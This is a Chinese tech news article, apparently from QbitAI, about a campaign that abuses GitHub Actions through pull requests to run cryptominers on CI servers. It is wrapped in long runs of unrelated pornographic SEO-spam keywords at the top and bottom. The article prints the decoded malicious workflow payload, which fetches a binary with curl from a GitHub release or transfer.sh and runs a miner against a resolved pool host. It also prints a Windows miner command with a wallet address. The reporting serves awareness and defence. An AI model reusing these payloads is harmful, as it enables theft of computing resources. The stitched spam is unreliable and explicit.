色综合中文综合网_性猛交娇小69hd_久久精品99久久久久久_欧美日韩精品一区二区三区四区 _97视频色精品_国产高清精品久久久久_日日鲁鲁鲁夜夜爽爽狠狠视频97 _国产成人免费视频精品含羞草妖精 _熟女少妇在线视频播放_精品人妻一区二区三区麻豆91 _久久女同性恋中文字幕_一区二区福利视频

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

這種騷操作黑客也真想得出來

夢晨 曉查 發(fā)自 凹非寺
量子位 報(bào)道 | 公眾號 QbitAI

加密貨幣價(jià)格一路高漲,顯卡又買不起,怎么才能“廉價(jià)”挖礦?

黑客們動起了歪心思——“白嫖”服務(wù)器。

給PC植入挖礦木馬,已經(jīng)無法滿足黑客日益增長的算力需求,如果能用上GitHub的服務(wù)器,還不花錢,那當(dāng)然是極好的。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

而且整個過程可能比侵入PC還容易,甚至都不需要程序員上當(dāng)受騙。只需提交Pull Request(PR),即使項(xiàng)目管理者沒有批準(zhǔn),惡意挖礦代碼依然能夠執(zhí)行。

原理也很簡單,利用GitHub Action的自動執(zhí)行工作流功能,輕松將挖礦程序運(yùn)行在GitHub的服務(wù)器上。

早在去年11月,就已經(jīng)有人發(fā)現(xiàn)黑客這種行為。更可怕的是,半年過去了,這種現(xiàn)象依然沒得到有效制止。

GitHub心里苦啊,雖然可以封禁違規(guī)賬號,但黑客們玩起了“游擊戰(zhàn)術(shù)”,不斷更換馬甲號逃避“追捕”,讓官方疲于奔命。

就在幾天前,一位荷蘭的程序員還發(fā)現(xiàn),這種攻擊方式依然存在,甚至代碼里還出現(xiàn)了中文。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

那么,這些黑客是如何植入挖礦程序的呢?一切要從發(fā)現(xiàn)異常的法國程序員Tib說起。

PR異常讓程序員起疑心

去年11月,Tib發(fā)現(xiàn),自己在一個沒有參加的repo上收到了PR請求。而且在14個小時(shí)內(nèi)就收到了7個,全是來自一個“y4ndexhater1”的用戶,沒有任何描述內(nèi)容。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

令人感到奇怪的是,這并不是一個熱門項(xiàng)目,Star數(shù)量為0。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

打開項(xiàng)目主頁發(fā)現(xiàn),內(nèi)容是Perl項(xiàng)目的github action、circle ci、travis-ci示例代碼集合,整個README文檔一團(tuán)糟,根本不像一個正經(jīng)的開源項(xiàng)目。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

然而就是這個混亂又冷門的repo,居然在3天里被fork了2次。

一切都太不正常了,讓人嗅到了一絲不安的氣息。

嘗試“作死”運(yùn)行

本著“作死”的精神,Tib決定一探究竟。

經(jīng)過那位可疑用戶的操作,Tib所有的action都被刪除,在工作流里被加入了一個ci.yml文件,內(nèi)容如下:

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

當(dāng)Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt這一行內(nèi)容后,立刻從沙發(fā)上跳了起來,他意識到事情的嚴(yán)重性:有人在入侵他的GitHub個人資料!

這串看似神秘的字符,其實(shí)是base64編碼,經(jīng)過翻譯后,得到了另一段代碼:

apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H?‘accept: application/dns-json’?‘https://dns.google/resolve?name=poolio.magratmail.xyz&type=A’?| jq -r?‘.Answer[0].data’)
chmod u+x prog
timeout 4h ./prog -o?“${ip}:3000” -u ChrisBarnatt -p ExplainingComputers –cpu-priority 5 > /dev/null

前面兩行不必解釋,有意思的地方從第三行開始,它會下載一個prog二進(jìn)制文件。

為了安全起見,Tib先嘗試獲取信息而不是執(zhí)行,得到了它的十六進(jìn)制代碼。

$ objdump -s –section .comment prog
prog: file format elf64-x86-64
Contents of section .comment:
0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.
0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1
0020 20323032 30313230 3300 20201203.

Tib也考慮過反編譯,但是沒有成功。

不入虎穴,焉得虎子,Tib決定嘗試運(yùn)行一下。

要執(zhí)行這一大膽而又作死的任務(wù),防止“試試就逝世”,Tib首先斷開了電腦的網(wǎng)絡(luò)鏈接,并選擇在Docker容器中運(yùn)行。

答案終于揭曉,原來這個prog是一個名為XMRig的挖礦程序。

$ ./prog –version
XMRig 6.8.1
built on Feb 3 2021 with GCC 10.2.1
features: 64-bit AES
libuv/1.40.0
OpenSSL/1.1.1i
hwloc/2.4.0

當(dāng)時(shí)XMRig的最新版恰好是6.8.1,和上面的版本參數(shù)符合。不過用SHA256檢測后發(fā)現(xiàn),這個prog并不完全是XMRig,Tib預(yù)測它可能是一個修改版。

實(shí)際上,可能被攻擊的不止GitHub,安全公司Aqua推測,像Docker Hub、Travis CI、Circle CI這些SaaS軟件開發(fā)環(huán)境,都可能遭受這類攻擊。

在這個攻擊過程中,會派生一個合法的repo,負(fù)責(zé)將惡意的GitHub Action添加到原始代碼。然后,黑客再向原始repo提交一個PR,將代碼合并回原始repo。

下載的挖礦程序會偽裝成prog或者gcc編譯器,通過提交PR在項(xiàng)目執(zhí)行自動化工作流。此時(shí)服務(wù)器將運(yùn)行偽裝后的挖礦程序。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

這些攻擊者僅一次攻擊就可以運(yùn)行多達(dá)100個挖礦程序,從而給GitHub的服務(wù)器帶來了巨大的計(jì)算量。

據(jù)Aqua估計(jì),僅在三天的時(shí)間里,挖礦黑客就在GitHub上有超過2.33萬次commit、在Docker Hub上5.8萬次build,轉(zhuǎn)化了大約3萬個挖礦任務(wù)。

可以防范但很難根除

這種攻擊甚至不需要被攻擊的倉庫管理者接受惡意Pull Request。

只要在.github/workflows目錄里面的任意.yml文件中配置了在收到Pull Request時(shí)執(zhí)行,來自黑客的Action就會自動被執(zhí)行

如果你沒有使用這個功能,那就不用擔(dān)心啦,黑客大概也不會找上你。

需要用到這個功能的話,可以設(shè)置成只允許本地Action或只允許Github官方及特定作者創(chuàng)建的Action。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

將情況反饋給客服后,GitHub會對惡意賬號進(jìn)行封號和關(guān)閉相關(guān)Pull Request的操作。

但惡意攻擊很難被根除,黑客只需要注冊新的賬號就可以繼續(xù)白嫖服務(wù)器資源。

攻擊還在繼續(xù)

我們從最近一次攻擊中發(fā)現(xiàn),黑客將挖礦程序上傳到GitLab并偽裝成包管理工具npm。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

打開這個可疑的nani.bat,可以看到:

npm.exe –algorithm argon2id_chukwa2
–pool turtlecoin.herominers.com:10380
–wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
–password xo

這一次黑客挖的是烏龜幣*(TurtleCoin)*,可使用CPU計(jì)算。按當(dāng)前價(jià)格挖出四千多個幣才值1美元。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

Github Actions的免費(fèi)服務(wù)器可以提供英特爾E5 2673v4的兩個核心,7GB內(nèi)存。

大致估算單臺運(yùn)行一天只能獲利幾美分,而且黑客的挖礦程序通常只能在被發(fā)現(xiàn)之前運(yùn)行幾個小時(shí)。比如Docker Hub就把自動build的運(yùn)行時(shí)間限制在2個小時(shí)。

不過蚊子再小也是肉,黑客通過尋找更多接受公開Action的倉庫以及反復(fù)打開關(guān)閉Pull Request就能執(zhí)行更多的挖礦程序。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

△同一黑客賬號至少攻擊了95個GitHub倉庫

正如Twitter用戶Dave Walker所說的,如果你提供免費(fèi)的計(jì)算資源,就要做好會被攻擊和濫用的覺悟。挖礦有利可圖的情況下這是不可避免的。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

據(jù)報(bào)道,受害的不止GitHub,還有Docker Hub、Travis CI以及Circle CI等提供類似服務(wù)的持續(xù)集成平臺。

這一亂象不知何時(shí)才能結(jié)束,唯一的好消息可能就是,挖礦的黑客似乎只是針對GitHub提供的服務(wù)器資源,而不會破壞你的代碼。

但是GitHub Action的漏洞不止這一個。還有方法能使黑客讀寫開發(fā)者的倉庫,甚至可以讀取加密的機(jī)密文件。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

去年7月,Google Project Zero團(tuán)隊(duì)就已向GitHub通報(bào)漏洞。但在給出的90天修復(fù)期限+延長14天后,GitHub仍未能有效解決。

對此,我們的建議是,不要輕易相信GitHub市場里的Action作者,不要交出你的密匙。

參考鏈接:
[1]https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/
[2]https://dev.to/thibaultduponchelle/the-github-action-mining-attack-through-pull-request-2lmc
[3]https://blog.aquasec.com/container-security-alert-campaign-abusing-github-dockerhub-travis-ci-circle-ci
[4]https://twitter.com/JustinPerdok
[5]https://bugs.chromium.org/p/project-zero/issues/detail?id=2070

版權(quán)所有,未經(jīng)授權(quán)不得以任何形式轉(zhuǎn)載及使用,違者必究。
亚洲国产精品视频| 中国黄色片一级| 日韩成人免费电影| 91国产精品视频在线| 午夜精品福利在线视频| 51午夜精品国产| 日韩有码免费视频| 中文字幕乱码日本亚洲一区二区 | 久久se这里有精品| 国产精品免费一区豆花| 中文字幕免费高清在线观看| 日韩中文字幕网站| 欧美日韩精品在线观看视频| 精品国产一区二区三区四区四| 亚洲妇女无套内射精| 亚洲成人自拍偷拍| 国产精品欧美激情在线观看| 国产精品久久久久精k8| 妞干网在线播放| 久久久久久久久岛国免费| 色播五月综合| 丰满少妇久久久久久久| 极品校花啪啪激情久久| 麻豆免费看一区二区三区| 成人精品视频99在线观看免费| 国产强被迫伦姧在线观看无码| 91wwwcom在线观看| 国产精品高潮呻吟av| 97视频免费观看| 国产尤物在线观看| 欧美孕妇孕交黑巨大网站| 美女黄页在线观看| 久久久久久国产精品三级玉女聊斋| 日本三级免费看| 久久久精品免费视频| 中文字幕第15页| 欧美激情视频一区| 超碰在线97观看| 91禁国产网站| 日本黄色不卡视频| 波多野结衣久草一区| 经典三级在线一区| 欧美日韩亚洲在线 | 亚洲国产成人av在线| 精品一区二区6| 亚洲视频在线播放| 国产精品一区二区三区四| 久久中文字幕视频| 中文字幕在线观看欧美| 国产精品爽爽爽| 蜜臀av亚洲一区中文字幕| 精品视频第一区| 99这里只有精品| 国产成人一二三区| 亚洲一区二区三区自拍| 极品人妻一区二区| 欧美成人女星排行榜| 人妻人人澡人人添人人爽| 久久香蕉国产线看观看av| 国产美女主播在线观看| 成人一区二区三区四区| 成人精品一区二区三区四区| 久久久久久www| 欧美视频在线看| 无码人妻精品一区二区中文| 视频一区免费观看| 欧美一进一出视频| 亚洲欧美日韩久久| 成人免费看片网址| 99久久er热在这里只有精品66| 在线免费观看av网| 青青青在线观看视频| 精品五月天久久| 波多野结衣91| 麻豆一区二区99久久久久| 日韩三级视频在线| 亚洲在线观看一区| 日韩国产精品视频| 日韩精品亚洲一区二区三区免费| 国产日韩精品中文字无码| 九九九久久久久久| 黄页视频在线91| 97人妻精品一区二区三区软件| 中文字幕线观看| 色婷婷av一区二区三区久久| 久久精品夜夜夜夜久久| 黄色一级片国产| 久久亚洲春色中文字幕| 亚洲一区在线免费观看| 精品亚洲porn| 精品人妻一区二区三区四区不卡 | 欧美日韩人妻精品一区在线| 3d动漫啪啪精品一区二区免费| av免费在线不卡| 毛片毛片毛片毛片毛片毛片毛片毛片毛片| 免费超爽大片黄| 91久久精品www人人做人人爽 | 分分操这里只有精品| 久久久精品国产免大香伊| 一区二区国产欧美| 亚洲欧美精品一区二区三区| 久久久一二三区| 国产在线观看你懂的| 真实国产乱子伦对白在线| 日本在线观看a| 成人性教育视频在线观看| 亚洲国产高潮在线观看| 国产精品美女久久福利网站| 国产精品一区二区6| 国产99视频在线观看| 欧美性大战久久久久久久 | 亚洲日本欧美在线| 日韩中文字幕在线播放| 欧美性高跟鞋xxxxhd| 日韩三级一区二区三区| 在线观看日韩精品视频| 亚洲综合网中心| 国产成人综合久久| 国产亚洲精品成人av久久ww| 国产精一品亚洲二区在线视频| 精品人妻中文无码av在线| 鲁丝一区二区三区免费| 在线成人小视频| 久久美女性网| 国产精品1区2区3区4区| 久久成人国产精品入口| 国产无遮挡免费视频| 婷婷精品国产一区二区三区日韩 | 成人亚洲激情网| 色八戒一区二区三区| 亚洲激情综合网| 亚洲一本大道在线| 中文日韩在线观看| 亚洲aⅴ日韩av电影在线观看 | 国产精品入口日韩视频大尺度| 亚洲毛片在线看| 亚洲国产wwwccc36天堂| 91免费精品国自产拍在线不卡| 日本午夜精品视频在线观看| 一级成人黄色片| 日韩专区第三页| 欧美精品国产精品日韩精品| 亚洲一区二区三区在线播放| 少妇荡乳情欲办公室456视频| 国产aⅴ爽av久久久久成人| 亚洲免费视频二区| 在线看片中文字幕| 精品无码在线观看| 18岁成人毛片| 九一九一国产精品| 五月天激情综合| 久久99久久久久久久噜噜| 国产精品麻豆免费版| 国内精品视频在线播放| 97久草视频| 波多野结衣一二区| 欧美老熟妇乱大交xxxxx| a级大片免费看| 人妻体内射精一区二区| 91av免费看| 亚洲情综合五月天| 精品动漫一区二区| 国产美女精品一区二区三区| 成年人视频免费| 国产女人爽到高潮a毛片| 国产精品久久无码一三区| 亚洲成人第一网站| 精品人妻一区二区三区蜜桃| 成人av一区二区三区在线观看| 亚洲人精品午夜| 九色精品美女在线| 久久福利一区二区| 成人免费毛片日本片视频| 精品成人久久久| av图片在线观看| 欧美成人手机视频| 99re6热在线精品视频| 国产探花在线视频| 亚洲综合图片网| 女~淫辱の触手3d动漫| 亚洲av熟女高潮一区二区| www.成人免费视频| 26uuu国产日韩综合| 久久99最新地址| 亚洲精品福利视频网站| 亚洲三级 欧美三级| 精品露脸国产偷人在视频| 亚洲视频欧洲视频| 久久国产一区二区三区| 青春草在线视频免费观看| 成人免费视频国产免费| 91久久精品一区二区三| 精品一区久久久| 永久免费未视频| 蜜臀久久99精品久久久久宅男| 国产精品一区久久久久| av不卡免费在线观看| 亚洲精品成人在线| 日韩欧美国产一区在线观看| 久久免费在线观看| 久久精品免费播放| 久久久精品久久| 日本一区二区三区四区在线观看 | 国产三级精品三级在线专区| 国产精品污污网站在线观看 | 韩国成人av| www.污污视频| 青草国产精品久久久久久| 精品免费一区二区三区| 国产日韩欧美久久| 91在线精品一区二区| 国产v综合ⅴ日韩v欧美大片 | 国产91色在线|免| av片在线免费| 我不卡一区二区| 一区二区三区亚洲视频| 国产精品青草久久| 日韩欧美成人激情| 亚洲国产天堂久久国产91| 亚洲人成在线观看网站高清| 欧美久久精品一级黑人c片| 人人做人人澡人人爽欧美| 92国产精品视频| 国产农村妇女精品久久| 亚洲天堂手机在线| 麻豆国产精品777777在线| 日本乱码高清不卡字幕| 国产欧美日韩丝袜精品一区| 国产极品视频在线观看| 亚洲午夜在线电影| 欧美亚洲日本一区二区三区| 狠狠网亚洲精品| 国产成人精品免高潮费视频| 精品视频第一页| 麻豆专区一区二区三区四区五区| 一本大道久久a久久综合| 美日韩精品免费视频| 992tv快乐视频| 久久久久99精品成人片我成大片| 国产日韩欧美精品一区| 欧美日韩亚洲天堂| 久99久在线视频| 久久久久久久久久久影视| 欧美二区在线视频| 国产激情第一页| 国产激情一区二区三区桃花岛亚洲| 亚洲精品视频久久| 在线不卡视频一区二区| 很污的网站在线观看| 国产av精国产传媒| 精品国产区一区| 在线免费视频a| 亚洲欧美偷拍另类a∨色屁股| 欧美一级做性受免费大片免费| 日韩精品手机在线观看| 97视频热人人精品| 伊人再见免费在线观看高清版| 亚洲精品自拍网| 国产精品suv一区二区三区| 丝袜美腿一区二区三区| 国产欧美精品一区二区色综合| 欧美一区二区在线看| 热re99久久精品国产66热| 99精品一级欧美片免费播放| 国产污在线观看| 精品国产伦一区二区三| 亚洲美女屁股眼交3| 色999日韩欧美国产| 亚洲日本japanese丝袜| 免费成人深夜夜行p站| 国产成人精品白浆久久69| 国产精品欧美一区二区三区| 日韩av一区在线| 麻豆av一区| 成熟人妻av无码专区| 精品一区二区三区在线观看| 欧美精品乱码久久久久久| 91久久夜色精品国产网站| 香蕉久久久久久av成人| 丝袜亚洲另类欧美综合| 欧美在线一二三| 99re视频在线播放| 欧美三级视频网站| 97久久精品人人做人人爽50路| 精品久久久久久久久久久院品网| 国产欧美亚洲日本| 精品无码一区二区三区电影桃花 | 午夜精品在线播放| 亚洲一区二区三区四区中文字幕 | 午夜欧美一区二区三区在线播放| 香蕉网在线播放| 国产精品久久久毛片| 99久久精品无免国产免费| 亚洲va韩国va欧美va| 成人h猎奇视频网站| 国产偷人妻精品一区| 99精品在线观看视频| 久久99视频免费| www.啪啪.com| 91美女福利视频| 国产精品嫩草影院一区二区| 偷拍夫妻性生活| 久久噜噜亚洲综合| 国产精品视频xxxx| 在线观看国产网站| 国产欧美一区二区三区网站| 国产成人精品综合久久久| 成年人网站免费看| 17c精品麻豆一区二区免费| 国产精品一区二区三区成人| 蜜桃av.com| 天天亚洲美女在线视频| 欧洲成人一区二区| 亚洲人成电影网站色mp4| 亚洲欧洲99久久| 精品免费视频123区| 精品无码久久久久久久| 色国产精品一区在线观看| 亚洲一区二区三区精品在线观看| 亚洲熟女乱色一区二区三区久久久| 日韩视频在线观看一区二区| 韩国日本美国免费毛片| 91在线一区二区| 国产在线观看不卡| 亚洲综合精品在线| 欧美xxxx14xxxxx性爽| 欧美一级大片在线免费观看| 视频一区二区综合| 国产馆在线观看| 一区二区三区四区五区视频在线观看| 成人免费高清完整版在线观看| 亚洲综合一二三| 欧美午夜性视频| 黄色激情小视频| 一本到三区不卡视频| 日韩av三级在线| 国产拍欧美日韩视频二区| 国产视频99| 国产熟女一区二区三区四区| 国产亚洲精品久久久久久牛牛| 精品国产大片大片大片| 欧美三电影在线| 亚洲免费成人在线视频| 亚洲激情男女视频| 黄色av免费在线播放| 国产精品传媒入口麻豆| 成人免费看片'免费看| 久久久久久久久久久黄色 | 日本视频中文字幕一区二区三区| 国产精品久久不能| 成人激情四射网| 国产日韩欧美自拍| 免费观看a视频| 亚洲最大的网站| 麻豆成人免费电影| 日韩欧美一区二区视频在线播放 | 成人性视频网站| 中国成人在线视频| 国产精品卡一卡二| www.久久91| 精品福利一二区| 欧美三级午夜理伦| 国产精国产精品| 国产理论片在线观看| 成人精品在线视频| 丁香激情综合五月| 国模无码视频一区二区三区| 欧美色播在线播放| 天天操天天舔天天射| 欧美精品制服第一页| 天天干在线观看| 欧美日韩国产三区| 一区二区三区日韩精品视频| 污片免费在线观看| 欧美成人精品不卡视频在线观看| 精品人妻少妇AV无码专区| 国产日韩欧美精品| 亚洲天堂av老司机| 国产交换配乱淫视频免费| 色狠狠av一区二区三区香蕉蜜桃| 亚洲精品网站在线| 51xx午夜影福利| 91精品一区二区三区久久久久久| 欧美一二三区视频| 六月丁香综合在线视频| 亚洲精品小视频| 国产黄色录像片| 91精品国产高清自在线| 亚洲精品免费在线观看视频| 国产经品一区二区| 欧美日韩在线影院| 非洲一级黄色片| 日韩av毛片网| 懂色av一区二区夜夜嗨| 三上悠亚av一区二区三区| 欧美日本视频在线| 成人一级免费视频| 亚洲图色在线| 欧美一级片在线| 亚洲黄色小说网址| 青青草视频在线免费播放| 4438x亚洲最大成人网| 免费毛片一区二区三区| 精品婷婷色一区二区三区蜜桃| 亚洲女人的天堂| 日本少妇做爰全过程毛片| 日本一级黄色录像| 99re在线视频观看| 亚洲一区二区三区四区五区中文| 中国免费黄色片|